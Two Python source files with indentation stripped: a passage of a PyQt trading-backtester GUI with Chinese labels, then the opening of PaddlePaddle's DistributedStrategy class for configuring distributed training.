optimization_button.clicked.connect(self.start_optimization)
self.result_button = QtWidgets.QPushButton("优化结果")
self.result_button.clicked.connect(self.show_optimization_result)
self.result_button.setEnabled(False)
downloading_button = QtWidgets.QPushButton("下载数据")
downloading_button.clicked.connect(self.start_downloading)
for button in [
backtesting_button,
optimization_button,
downloading_button,
self.result_button
]:
button.setFixedHeight(button.sizeHint().height() * 2)
form = QtWidgets.QFormLayout()
form.addRow("交易策略", self.class_combo)
form.addRow("本地代码", self.symbol_line)
form.addRow("K线周期", self.interval_combo)
form.addRow("开始日期", self.start_date_edit)
form.addRow("结束日期", self.end_date_edit)
form.addRow("手续费率", self.rate_line)
form.addRow("交易滑点", self.slippage_line)
form.addRow("合约乘数", self.size_line)
form.addRow("价格跳动", self.pricetick_line)
form.addRow("回测资金", self.capital_line)
form.addRow(backtesting_button)
left_vbox = QtWidgets.QVBoxLayout()
left_vbox.addLayout(form)
left_vbox.addWidget(downloading_button)
left_vbox.addStretch()
left_vbox.addWidget(optimization_button)
left_vbox.addWidget(self.result_button)
# Result part
self.statistics_monitor = StatisticsMonitor()
self.log_monitor = QtWidgets.QTextEdit()
self.log_monitor.setMaximumHeight(400)
self.chart = BacktesterChart()
self.chart.setMinimumWidth(1000)
# Layout
vbox = QtWidgets.QVBoxLayout()
vbox.addWidget(self.statistics_monitor)
vbox.addWidget(self.log_monitor)
hbox = QtWidgets.QHBoxLayout()
hbox.addLayout(left_vbox)
hbox.addLayout(vbox)
hbox.addWidget(self.chart)
self.setLayout(hbox)
def register_event(self):
""""""
self.signal_log.connect(self.process_log_event)
self.signal_backtesting_finished.connect(
self.process_backtesting_finished_event)
self.signal_optimization_finished.connect(
self.process_optimization_finished_event)
self.event_engine.register(EVENT_BACKTESTER_LOG, self.signal_log.emit)
self.event_engine.register(
EVENT_BACKTESTER_BACKTESTING_FINISHED, self.signal_backtesting_finished.emit)
self.event_engine.register(
EVENT_BACKTESTER_OPTIMIZATION_FINISHED, self.signal_optimization_finished.emit)
def process_log_event(self, event: Event):
""""""
msg = event.data
self.write_log(msg)
def write_log(self, msg):
""""""
timestamp = datetime.now().strftime("%H:%M:%S")
msg = f"{timestamp}\t{msg}"
self.log_monitor.append(msg)
def process_backtesting_finished_event(self, event: Event):
""""""
statistics = self.backtester_engine.get_result_statistics()
self.statistics_monitor.set_data(statistics)
df = self.backtester_engine.get_result_df()
self.chart.set_data(df)
def process_optimization_finished_event(self, event: Event):
""""""
self.write_log("请点击[优化结果]按钮查看")
self.result_button.setEnabled(True)
def start_backtesting(self):
""""""
class_name = self.class_combo.currentText()
vt_symbol = self.symbol_line.text()
interval = self.interval_combo.currentText()
start = self.start_date_edit.date().toPyDate()
end = self.end_date_edit.date().toPyDate()
rate = float(self.rate_line.text())
slippage = float(self.slippage_line.text())
size = float(self.size_line.text())
pricetick = float(self.pricetick_line.text())
capital = float(self.capital_line.text())
old_setting = self.settings[class_name]
dialog = BacktestingSettingEditor(class_name, old_setting)
i = dialog.exec()
if i != dialog.Accepted:
return
new_setting = dialog.get_setting()
self.settings[class_name] = new_setting
result = self.backtester_engine.start_backtesting(
class_name,
vt_symbol,
interval,
start,
end,
rate,
slippage,
size,
pricetick,
capital,
new_setting
)
if result:
self.statistics_monitor.clear_data()
self.chart.clear_data()
def start_optimization(self):
""""""
class_name = self.class_combo.currentText()
vt_symbol = self.symbol_line.text()
interval = self.interval_combo.currentText()
start = self.start_date_edit.date().toPyDate()
end = self.end_date_edit.date().toPyDate()
rate = float(self.rate_line.text())
slippage = float(self.slippage_line.text())
size = float(self.size_line.text())
pricetick = float(self.pricetick_line.text())
capital = float(self.capital_line.text())
parameters = self.settings[class_name]
dialog = OptimizationSettingEditor(class_name, parameters)
i = dialog.exec()
if i != dialog.Accepted:
return
optimization_setting, use_ga = dialog.get_setting()
self.target_display = dialog.target_display
self.backtester_engine.start_optimization(
class_name,
vt_symbol,
interval,
start,
end,
rate,
slippage,
size,
pricetick,
capital,
optimization_setting,
use_ga
)
self.result_button.setEnabled(False)
def start_downloading(self):
""""""
vt_symbol = self.symbol_line.text()
interval = self.interval_combo.currentText()
start = self.start_date_edit.date().toPyDate()
end = self.end_date_edit.date().toPyDate()
self.backtester_engine.start_downloading(
vt_symbol,
interval,
start,
end
)
def show_optimization_result(self):
""""""
result_values = self.backtester_engine.get_result_values()
dialog = OptimizationResultMonitor(
result_values,
self.target_display
)
dialog.exec_()
def show(self):
""""""
self.showMaximized()
class StatisticsMonitor(QtWidgets.QTableWidget):
""""""
KEY_NAME_MAP = {
"start_date": "首个交易日",
"end_date": "最后交易日",
"total_days": "总交易日",
"profit_days": "盈利交易日",
"loss_days": "亏损交易日",
"capital": "起始资金",
"end_balance": "结束资金",
"total_return": "总收益率",
"annual_return": "年化收益",
"max_drawdown": "最大回撤",
"max_ddpercent": "百分比最大回撤",
"total_net_pnl": "总盈亏",
"total_commission": "总手续费",
"total_slippage": "总滑点",
"total_turnover": "总成交额",
"total_trade_count": "总成交笔数",
"daily_net_pnl": "日均盈亏",
"daily_commission": "日均手续费",
"daily_slippage": "日均滑点",
"daily_turnover": "日均成交额",
"daily_trade_count": "日均成交笔数",
"daily_return": "日均收益率",
"return_std": "收益标准差",
"sharpe_ratio": "夏普比率",
"return_drawdown_ratio": "收益回撤比"
}
def __init__(self):
""""""
super().__init__()
self.cells = {}
self.init_ui()
def init_ui(self):
""""""
self.setRowCount(len(self.KEY_NAME_MAP))
self.setVerticalHeaderLabels(list(self.KEY_NAME_MAP.values()))
self.setColumnCount(1)
self.horizontalHeader().setVisible(False)
self.horizontalHeader().setSectionResizeMode(
QtWidgets.QHeaderView.Stretch
)
self.setEditTriggers(self.NoEditTriggers)
for row, key in enumerate(self.KEY_NAME_MAP.keys()):
cell = QtWidgets.QTableWidgetItem()
self.setItem(row, 0, cell)
self.cells[key] = cell
def clear_data(self):
""""""
for cell in self.cells.values():
cell.setText("")
def set_data(self, data: dict):
""""""
data["capital"] = f"{data['capital']:,.2f}"
data["end_balance"] = f"{data['end_balance']:,.2f}"
data["total_return"] = f"{data['total_return']:,.2f}%"
data["annual_return"] = f"{data['annual_return']:,.2f}%"
data["max_drawdown"] = f"{data['max_drawdown']:,.2f}"
data["max_ddpercent"] = f"{data['max_ddpercent']:,.2f}%"
data["total_net_pnl"] = f"{data['total_net_pnl']:,.2f}"
data["total_commission"] = f"{data['total_commission']:,.2f}"
data["total_slippage"] = f"{data['total_slippage']:,.2f}"
data["total_turnover"] = f"{data['total_turnover']:,.2f}"
data["daily_net_pnl"] = f"{data['daily_net_pnl']:,.2f}"
data["daily_commission"] = f"{data['daily_commission']:,.2f}"
data["daily_slippage"] = f"{data['daily_slippage']:,.2f}"
data["daily_turnover"] = f"{data['daily_turnover']:,.2f}"
data["daily_return"] = f"{data['daily_return']:,.2f}%"
data["return_std"] = f"{data['return_std']:,.2f}%"
data["sharpe_ratio"] = f"{data['sharpe_ratio']:,.2f}"
data["return_drawdown_ratio"] = f"{data['return_drawdown_ratio']:,.2f}"
for key, cell in self.cells.items():
value = data.get(key, "")
cell.setText(str(value))
class BacktestingSettingEditor(QtWidgets.QDialog):
"""
For creating new strategy and editing strategy parameters.
"""
def __init__(
self, class_name: str, parameters: dict
):
""""""
super(BacktestingSettingEditor, self).__init__()
self.class_name = class_name
self.parameters = parameters
self.edits = {}
self.init_ui()
def init_ui(self):
""""""
form = QtWidgets.QFormLayout()
# Add vt_symbol and name edit if add new strategy
self.setWindowTitle(f"策略参数配置:{self.class_name}")
button_text = "确定"
parameters = self.parameters
for name, value in parameters.items():
type_ = type(value)
edit = QtWidgets.QLineEdit(str(value))
if type_ is int:
validator = QtGui.QIntValidator()
edit.setValidator(validator)
elif type_ is float:
validator = QtGui.QDoubleValidator()
edit.setValidator(validator)
form.addRow(f"{name} {type_}", edit)
self.edits[name] = (edit, type_)
button = QtWidgets.QPushButton(button_text)
button.clicked.connect(self.accept)
form.addRow(button)
self.setLayout(form)
def get_setting(self):
""""""
setting = {}
for name, tp in self.edits.items():
edit, type_ = tp
value_text = edit.text()
if type_ == bool:
if value_text == "True":
value = True
else:
value = False
else:
value = type_(value_text)
setting[name] = value
return setting
class BacktesterChart(pg.GraphicsWindow):
""""""
def __init__(self):
""""""
super().__init__(title="Backtester Chart")
self.dates = {}
self.init_ui()
def init_ui(self):
""""""
pg.setConfigOptions(antialias=True)
# Create plot widgets
self.balance_plot = self.addPlot(
title="账户净值",
axisItems={"bottom": DateAxis(self.dates, orientation="bottom")}
)
self.nextRow()
self.drawdown_plot = self.addPlot(
title="净值回撤",
axisItems={"bottom": DateAxis(self.dates, orientation="bottom")}
)
self.nextRow()
self.pnl_plot = self.addPlot(
title="每日盈亏",
axisItems={"bottom": DateAxis(self.dates, orientation="bottom")}
)
self.nextRow()
self.distribution_plot = self.addPlot(title="盈亏分布")
# Add curves and bars on plot widgets
self.balance_curve = self.balance_plot.plot(
pen=pg.mkPen("#ffc107", width=3)
)
dd_color = "#303f9f"
self.drawdown_curve = self.drawdown_plot.plot(
fillLevel=-0.3, brush=dd_color, pen=dd_color
)
profit_color = 'r'
loss_color = 'g'
self.profit_pnl_bar = pg.BarGraphItem(
x=[], height=[], width=0.3, brush=profit_color, pen=profit_color
)
self.loss_pnl_bar = pg.BarGraphItem(
x=[], height=[], width=0.3, brush=loss_color, pen=loss_color
)
self.pnl_plot.addItem(self.profit_pnl_bar)
self.pnl_plot.addItem(self.loss_pnl_bar)
distribution_color = "#6d4c41"
self.distribution_curve = self.distribution_plot.plot(
fillLevel=-0.3, brush=distribution_color, pen=distribution_color
)
def clear_data(self):
""""""
self.balance_curve.setData([], [])
self.drawdown_curve.setData([], [])
self.profit_pnl_bar.setOpts(x=[], height=[])
self.loss_pnl_bar.setOpts(x=[], height=[])
self.distribution_curve.setData([], [])
def set_data(self, df):
""""""
if df is None:
return
count = len(df)
self.dates.clear()
for n, date in enumerate(df.index):
self.dates[n] = date
# Set data for curve of balance and drawdown
self.balance_curve.setData(df["balance"])
self.drawdown_curve.setData(df["drawdown"])
# Set data for daily pnl bar
profit_pnl_x = []
profit_pnl_height = []
loss_pnl_x = []
loss_pnl_height = []
for count, pnl in enumerate(df["net_pnl"]):
if pnl >= 0:
profit_pnl_height.append(pnl)
profit_pnl_x.append(count)
else:
loss_pnl_height.append(pnl)
loss_pnl_x.append(count)
self.profit_pnl_bar.setOpts(x=profit_pnl_x, height=profit_pnl_height)
self.loss_pnl_bar.setOpts(x=loss_pnl_x, height=loss_pnl_height)
# Set data for pnl distribution
hist, x = np.histogram(df["net_pnl"], bins="auto")
x = x[:-1]
self.distribution_curve.setData(x, hist)
class DateAxis(pg.AxisItem):
"""Axis for showing date data"""
def __init__(self, dates: dict, *args, **kwargs):
""""""
super().__init__(*args, **kwargs)
self.dates = dates
def tickStrings(self, values, scale, spacing):
""""""
strings = []
for v in values:
dt = self.dates.get(v, "")
strings.append(str(dt))
return strings
class OptimizationSettingEditor(QtWidgets.QDialog):
"""
For setting up parameters for optimization.
"""
DISPLAY_NAME_MAP = {
"总收益率": "total_return",
"夏普比率": "sharpe_ratio",
"收益回撤比": "return_drawdown_ratio",
"日均盈亏": "daily_net_pnl"
}
def __init__(
self, class_name: str, parameters: dict
):
""""""
super().__init__()
self.class_name = class_name
self.parameters = parameters
self.edits = {}
self.optimization_setting = None
self.use_ga = False
self.init_ui()
def init_ui(self):
""""""
QLabel = QtWidgets.QLabel
self.target_combo = QtWidgets.QComboBox()
self.target_combo.addItems(list(self.DISPLAY_NAME_MAP.keys()))
grid = QtWidgets.QGridLayout()
grid.addWidget(QLabel("目标"), 0, 0)
grid.addWidget(self.target_combo, 0, 1, 1, 3)
grid.addWidget(QLabel("参数"), 1, 0)
grid.addWidget(QLabel("开始"), 1, 1)
grid.addWidget(QLabel("步进"), 1, 2)
grid.addWidget(QLabel("结束"), 1, 3)
# Add vt_symbol and name edit if add new strategy
self.setWindowTitle(f"优化参数配置:{self.class_name}")
validator = QtGui.QDoubleValidator()
row = 2
for name, value in self.parameters.items():
type_ = type(value)
if type_ not in [int, float]:
continue
start_edit = QtWidgets.QLineEdit(str(value))
step_edit = QtWidgets.QLineEdit(str(1))
end_edit = QtWidgets.QLineEdit(str(value))
for edit in [start_edit, step_edit, end_edit]:
edit.setValidator(validator)
grid.addWidget(QLabel(name), row, 0)
grid.addWidget(start_edit, row, 1)
grid.addWidget(step_edit, row, 2)
grid.addWidget(end_edit, row, 3)
self.edits[name] = {
"type": type_,
"start": start_edit,
"step": step_edit,
"end": end_edit
}
row += 1
parallel_button = QtWidgets.QPushButton("多进程优化")
parallel_button.clicked.connect(self.generate_parallel_setting)
grid.addWidget(parallel_button, row, 0, 1, 4)
row += 1
ga_button = QtWidgets.QPushButton("遗传算法优化")
ga_button.clicked.connect(self.generate_ga_setting)
grid.addWidget(ga_button, row, 0, 1, 4)
self.setLayout(grid)
def generate_ga_setting(self):
""""""
self.use_ga = True
self.generate_setting()
def generate_parallel_setting(self):
""""""
self.use_ga = False
self.generate_setting()
def generate_setting(self):
""""""
self.optimization_setting = OptimizationSetting()
self.target_display = self.target_combo.currentText()
target_name = self.DISPLAY_NAME_MAP[self.target_display]
self.optimization_setting.set_target(target_name)
for name, d in self.edits.items():
type_ = d["type"]
start_value = type_(d["start"].text())
step_value = type_(d["step"].text())
end_value = type_(d["end"].text())
if start_value == end_value:
self.optimization_setting.add_parameter(name, start_value)
else:
self.optimization_setting.add_parameter(
name,
start_value,
end_value,
step_value
)
self.accept()
def get_setting(self):
""""""
return self.optimization_setting, self.use_ga
class OptimizationResultMonitor(QtWidgets.QDialog):
"""
For viewing optimization result.
"""
def __init__(
self, result_values: list, target_display: str
):
""""""
super().__init__()
self.result_values = result_values
self.target_display = target_display
self.init_ui()
def init_ui(self):
""""""
self.setWindowTitle("参数优化结果")
self.resize(1100, 500)
table = QtWidgets.QTableWidget()
table.setColumnCount(2)
table.setRowCount(len(self.result_values))
table.setHorizontalHeaderLabels(["参数", self.target_display])
table.setEditTriggers(table.NoEditTriggers)
table.verticalHeader().setVisible(False)
table.horizontalHeader().setSectionResizeMode(
0, QtWidgets.QHeaderView.ResizeToContents
)
table.horizontalHeader().setSectionResizeMode(
1, QtWidgets.QHeaderView.Stretch
)
for n, tp in enumerate(self.result_values):
setting, target_value, _ = tp
setting_cell = QtWidgets.QTableWidgetItem(str(setting))
target_cell = QtWidgets.QTableWidgetItem(str(target_value))
setting_cell.setTextAlignment(QtCore.Qt.AlignCenter)
target_cell.setTextAlignment(QtCore.Qt.AlignCenter)
table.setItem(n, 0, setting_cell)
table.setItem(n, 1, target_cell)
vbox = QtWidgets.QVBoxLayout()
vbox.addWidget(table)
self.setLayout(vbox)
|
the-stack_106_19044
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import paddle
from paddle.distributed.fleet.proto import distributed_strategy_pb2
from paddle.fluid.framework import Variable, set_flags, core
from paddle.fluid.wrapped_decorator import wrap_decorator
import google.protobuf.text_format
import google.protobuf
__all__ = ["DistributedStrategy"]
non_auto_func_called = True
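# The decorator below flips ``non_auto_func_called`` to False the first time a
# wrapped strategy setter is invoked, which (as far as this code shows) lets
# downstream logic distinguish user-specified settings from untouched defaults.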
def __non_auto_func_called__(func):
def __impl__(*args, **kwargs):
global non_auto_func_called
non_auto_func_called = False
return func(*args, **kwargs)
return __impl__
is_strict_auto = wrap_decorator(__non_auto_func_called__)
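# Convert a protobuf message into a plain dict keyed by field name.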
def get_msg_dict(msg):
res_dict = {}
fields = msg.DESCRIPTOR.fields
for f in fields:
res_dict[f.name] = getattr(msg, f.name)
return res_dict
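# Copy values from a config dict onto the matching fields of a protobuf message,
# extending repeated fields (label == 3) and assigning optional/required fields.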
def assign_configs_value(msg, config):
fields = msg.DESCRIPTOR.fields
for key in config:
for f in fields:
if key == f.name:
# LABEL_OPTIONAL = 1
# LABEL_REPEATED = 3
# LABEL_REQUIRED = 2
if f.label == 3:
getattr(msg, f.name).extend(config[f.name])
elif f.label == 1 or f.label == 2:
setattr(msg, f.name, config[f.name])
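# Assert that every key in ``config`` is a valid field name of the protobuf message.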
def check_configs_key(msg, config, field_name):
key_list = msg.DESCRIPTOR.fields_by_name.keys()
for key in config:
assert key in key_list, "key:{} not in {}".format(key, field_name)
class DistributedJobInfo(object):
"""
DistributedJobInfo will serialize all distributed training information
Just for inner use: 1) debug 2) replicate experiments
"""
def __init__(self):
self.job_info = distributed_strategy_pb2.DistributedJobInfo()
def _set_worker_num(self, worker_num):
self.job_info.worker_num = worker_num
def _set_server_num(self, server_num):
self.job_info.server_num = server_num
def _set_worker_ips(self, worker_ips):
self.job_info.worker_ips.extend(worker_ips)
def _set_server_endpoints(self, server_endpoints):
self.job_info.server_endpoints.extend(server_endpoints)
def _set_origin_startup(self, origin_startup_prog):
self.job_info.origin_startup = str(origin_startup_prog)
def _set_origin_main(self, origin_main_prog):
self.job_info.origin_main = str(origin_main_prog)
def _distributed_main(self, distributed_main_prog):
self.job_info.distributed_main = str(distributed_main_prog)
def _optimizer_name(self, optimizer_name):
self.job_info.optimizer_name = optimizer_name
def _set_distributed_strategy(self, dist_strategy):
self.job_info.strategy = dist_strategy
class DistributedStrategy(object):
__lock_attr = False
def __init__(self):
"""
DistributedStrategy is the main configuration entry for distributed training of Paddle.
All of the distributed training configurations can be configured in DistributedStrategy,
such as automatic mixed precision (AMP), Layer-wise Adaptive Rate Scaling (LARS),
asynchronous update parameter server(ASGD), etc.
DistributedStrategy can be serialized into protobuf file or deserialized from protobuf file
Users who run local training usually configure BuildStrategy and ExecutionStrategy, and
DistributedStrategy supports configurations from BuildStrategy and ExecutionStrategy
"""
self.strategy = distributed_strategy_pb2.DistributedStrategy()
# Set the default values of the following flags to the ones set by users
key = 'FLAGS_cudnn_batchnorm_spatial_persistent'
if core.globals().is_public(key):
self.strategy.cudnn_batchnorm_spatial_persistent = bool(
core.globals()[key])
key = 'FLAGS_conv_workspace_size_limit'
if core.globals().is_public(key):
self.strategy.conv_workspace_size_limit = int(core.globals()[key])
key = 'FLAGS_cudnn_exhaustive_search'
if core.globals().is_public(key):
self.strategy.cudnn_exhaustive_search = bool(core.globals()[key])
key = 'FLAGS_sync_nccl_allreduce'
if core.globals().is_public(key):
self.strategy.sync_nccl_allreduce = bool(core.globals()[key])
self.__lock_attr = True
def __setattr__(self, key, value):
if self.__lock_attr and not hasattr(self, key):
raise TypeError("%s is not an attribute of %s" %
(key, self.__class__.__name__))
object.__setattr__(self, key, value)
def save_to_prototxt(self, output):
"""
Serialize current DistributedStrategy to string and save to output file
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.dgc = True
strategy.recompute = True
strategy.recompute_configs = {"checkpoints": ["x"]}
strategy.save_to_prototxt("dist_strategy.prototxt")
"""
with open(output, "w") as fout:
fout.write(str(self.strategy))
def load_from_prototxt(self, pb_file):
"""
Load from prototxt file for DistributedStrategy initialization
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.load_from_prototxt("dist_strategy.prototxt")
"""
with open(pb_file, 'r') as f:
self.strategy = google.protobuf.text_format.Merge(
str(f.read()), self.strategy)
@property
def execution_strategy(self):
"""
Configure ExecutionStrategy for DistributedStrategy
Examples:
.. code-block:: python
import paddle
exe_strategy = paddle.static.ExecutionStrategy()
exe_strategy.num_threads = 10
exe_strategy.num_iteration_per_drop_scope = 10
exe_strategy.num_iteration_per_run = 10
strategy = paddle.distributed.fleet.DistributedStrategy()
strategy.execution_strategy = exe_strategy
"""
execution_strategy = paddle.fluid.ExecutionStrategy()
fields = self.strategy.execution_strategy.DESCRIPTOR.fields
for f in fields:
setattr(execution_strategy, f.name,
getattr(self.strategy.execution_strategy, f.name))
return execution_strategy
@execution_strategy.setter
@is_strict_auto
def execution_strategy(self, strategy):
fields = self.strategy.execution_strategy.DESCRIPTOR.fields
for f in fields:
setattr(self.strategy.execution_strategy, f.name,
getattr(strategy, f.name))
@property
def build_strategy(self):
"""
Configure BuildStrategy for DistributedStrategy
Note that the properties of BuildStrategy are valid in DistributedStrategy
only if the property is non-distributed strategy.
Examples:
.. code-block:: python
import paddle
build_strategy = paddle.static.BuildStrategy()
build_strategy.enable_sequential_execution = True
build_strategy.fuse_elewise_add_act_ops = True
build_strategy.fuse_bn_act_ops = True
build_strategy.enable_auto_fusion = True
build_strategy.fuse_relu_depthwise_conv = True
build_strategy.fuse_broadcast_ops = True
build_strategy.fuse_all_optimizer_ops = True
build_strategy.enable_inplace = True
strategy = paddle.distributed.fleet.DistributedStrategy()
strategy.build_strategy = build_strategy
"""
build_strategy = paddle.fluid.BuildStrategy()
fields = self.strategy.build_strategy.DESCRIPTOR.fields
for f in fields:
setattr(build_strategy, f.name,
getattr(self.strategy.build_strategy, f.name))
return build_strategy
@build_strategy.setter
@is_strict_auto
def build_strategy(self, strategy):
fields = self.strategy.build_strategy.DESCRIPTOR.fields
for f in fields:
if f.label == 1 or f.label == 2: # optional and required field
setattr(self.strategy.build_strategy, f.name,
getattr(strategy, f.name))
elif f.label == 3: # repeated field
getattr(self.strategy.build_strategy,
f.name).extend(getattr(strategy, f.name))
@property
def a_sync(self):
"""
Indicating whether we are using asynchronous stochastic gradient descent updates
for training. This property is valid when we are using parameter server training,
which is implied by setting an appropriate RoleMaker
Default value: True
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
role_maker = fleet.PaddleCloudRoleMaker()
fleet.init(role_maker)
strategy = fleet.DistributedStrategy()
strategy.a_sync = True # by default this is True
# code block for defining loss and local optimizer
# sgd = fleet.distributed_optimizer(optimizer, strategy)
"""
return self.strategy.a_sync
@a_sync.setter
@is_strict_auto
def a_sync(self, flag):
if isinstance(flag, bool):
self.strategy.a_sync = flag
self.a_sync_configs = {"k_steps": 0}
else:
raise ValueError(
"The type of `flag` is invalid, expected type is bool, "
"but received {}".format(type(flag)))
@property
def a_sync_configs(self):
"""
Set a_sync update configurations. In general, asynchronous parameter server
training has several configurable settings that can be configured through
a dict.
**Notes**:
k_steps(int): number of local optimization updates before communication
max_merge_var_num(int): maximum number of merged gradients before communication
send_queue_size(int): a buffer size of worker communication
independent_recv_thread(bool): if we are using independent recv thread for communication
thread_pool_size(int): number of thread pool
send_wait_times(int): waiting time for sending gradients
runtime_split_send_recv(bool): if we are using Tensor split for send and recv during runtime
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
role_maker = fleet.PaddleCloudRoleMaker()
fleet.init(role_maker)
strategy = fleet.DistributedStrategy()
strategy.a_sync = True # by default this is True
configs = {"k_steps": 1024, "send_queue_size": 32}
strategy.a_sync_configs = configs
# code block for defining loss and local optimizer
# sgd = fleet.distributed_optimizer(optimizer, strategy)
"""
return get_msg_dict(self.strategy.a_sync_configs)
@a_sync_configs.setter
@is_strict_auto
def a_sync_configs(self, configs):
check_configs_key(self.strategy.a_sync_configs, configs,
"a_sync_configs")
assign_configs_value(self.strategy.a_sync_configs, configs)
@property
def amp(self):
"""
Indicating whether we are using automatic mixed precision training
Default Value: False
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.amp = True # by default this is false
"""
return self.strategy.amp
@amp.setter
@is_strict_auto
def amp(self, flag):
if isinstance(flag, bool):
self.strategy.amp = flag
else:
print("WARNING: amp should have value of bool type")
@property
def amp_configs(self):
"""
Set automatic mixed precision training configurations. In general, amp has several configurable
settings that can be configured through a dict.
**Notes**:
init_loss_scaling(float): The initial loss scaling factor. Default 32768.
use_dynamic_loss_scaling(bool): Whether to use dynamic loss scaling. Default True.
incr_every_n_steps(int): Increases loss scaling every n consecutive steps with finite gradients. Default 1000.
decr_every_n_nan_or_inf(int): Decreases loss scaling every n accumulated steps with nan or inf gradients. Default 2.
incr_ratio(float): The multiplier to use when increasing the loss scaling. Default 2.0.
decr_ratio(float): The less-than-one-multiplier to use when decreasing the loss scaling. Default 0.5.
custom_white_list(list[str]): Users' custom white list of ops that always execute in fp16.
custom_black_list(list[str]): Users' custom black list of ops for which fp16 execution is forbidden.
custom_black_varnames(list[str]): Users' custom black variables' names.
use_pure_fp16(bool): Whether to use the pure fp16 training. Default False.
use_fp16_guard(bool): Whether to use `fp16_guard` when constructing the program.
Default True. Only takes effect when `use_pure_fp16` is turned on.
Examples 1:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.amp = True
strategy.amp_configs = {
"init_loss_scaling": 32768,
"custom_white_list": ['conv2d']}
Examples 2:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.amp = True
# pure fp16
strategy.amp_configs = {
"init_loss_scaling": 32768,
"use_pure_fp16": True
}
"""
return get_msg_dict(self.strategy.amp_configs)
@amp_configs.setter
@is_strict_auto
def amp_configs(self, configs):
check_configs_key(self.strategy.amp_configs, configs, "amp_configs")
assign_configs_value(self.strategy.amp_configs, configs)
@property
def recompute(self):
"""
Indicating whether we are using forward recomputation for memory optimization
Default value: False
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.recompute = True
# suppose x and y are names of checkpoint tensors for recomputation
strategy.recompute_configs = {"checkpoints": ["x", "y"]}
"""
return self.strategy.recompute
@property
def sync_nccl_allreduce(self):
"""
Indicating whether we are using synchronized allreduce in each communication thread.
We note that system overhead is usually lower when sync_nccl_allreduce = True
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.sync_nccl_allreduce = True
"""
return self.strategy.sync_nccl_allreduce
@sync_nccl_allreduce.setter
@is_strict_auto
def sync_nccl_allreduce(self, flag):
if isinstance(flag, bool):
self.strategy.sync_nccl_allreduce = flag
else:
print("WARNING: sync_nccl_allreduce should have value of bool type")
@property
def use_hierarchical_allreduce(self):
"""
Indicating whether we are using hierarchical allreduce in collective communication
        Hierarchical allreduce often does allreduce within a certain node group and then does
        allreduce among the leaders of each group.
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.use_hierarchical_allreduce = True
"""
return self.strategy.use_hierarchical_allreduce
@use_hierarchical_allreduce.setter
@is_strict_auto
def use_hierarchical_allreduce(self, flag):
if isinstance(flag, bool):
self.strategy.use_hierarchical_allreduce = flag
else:
print(
"WARNING: use_hierarchical_allreduce should have value of bool type"
)
@property
def hierarchical_allreduce_inter_nranks(self):
"""
Number of ranks for low level node groups in hierarchical allreduce
Default value: number of GPU cards on each single GPU machine
Example:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.hierarchical_allreduce_inter_nranks = 8
"""
return self.strategy.hierarchical_allreduce_inter_nranks
@hierarchical_allreduce_inter_nranks.setter
@is_strict_auto
def hierarchical_allreduce_inter_nranks(self, value):
if isinstance(value, int):
self.strategy.hierarchical_allreduce_inter_nranks = value
else:
print(
"WARNING: hierarchical_allreduce_inter_nranks should have value of int type"
)
@property
def sync_batch_norm(self):
"""
Indicating whether we are using sync_batch_norm to do synchronous batch normalization among all training nodes.
Default value: False
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.sync_batch_norm = True
"""
return self.strategy.sync_batch_norm
@sync_batch_norm.setter
@is_strict_auto
def sync_batch_norm(self, flag):
if isinstance(flag, bool):
self.strategy.sync_batch_norm = flag
else:
print("WARNING: sync_batch_norm should have value of bool type")
@property
def fuse_all_reduce_ops(self):
"""
Indicating whether we are using fuse_all_reduce_ops for gradient fusion during backward phase of training
Default value: True
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.fuse_all_reduce_ops = False
"""
return self.strategy.fuse_all_reduce_ops
@fuse_all_reduce_ops.setter
@is_strict_auto
def fuse_all_reduce_ops(self, flag):
if isinstance(flag, bool):
self.strategy.fuse_all_reduce_ops = flag
else:
print("WARNING: fuse_all_reduce_ops should have value of bool type")
@property
def fuse_grad_size_in_MB(self):
"""
Specifying the size of gradient to fuse in Mega-Bytes
Default value: 32
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.fuse_grad_size_in_MB = 50
"""
return self.strategy.fuse_grad_size_in_MB
@fuse_grad_size_in_MB.setter
@is_strict_auto
def fuse_grad_size_in_MB(self, value):
if isinstance(value, int):
self.strategy.fuse_grad_size_in_MB = value
else:
print("WARNING: fuse_grad_size_in_MB should have value of int type")
@property
def last_comm_group_size_MB(self):
"""
Specifying the size of gradient to fuse in Mega-Bytes when
the last group of each batch communicates. Making the last group
small is useful to improve performance.
Default value: 1
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.last_comm_group_size_MB = 2
"""
return self.strategy.last_comm_group_size_MB
@last_comm_group_size_MB.setter
@is_strict_auto
def last_comm_group_size_MB(self, value):
if value > 0:
self.strategy.last_comm_group_size_MB = value
else:
raise ValueError("last_comm_group_size_MB should be greater than 0")
@property
def find_unused_parameters(self):
"""
Indicating whether we are using find_unused_parameters to
find unused parameters in DataParallel.
Default value: True
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.find_unused_parameters = True
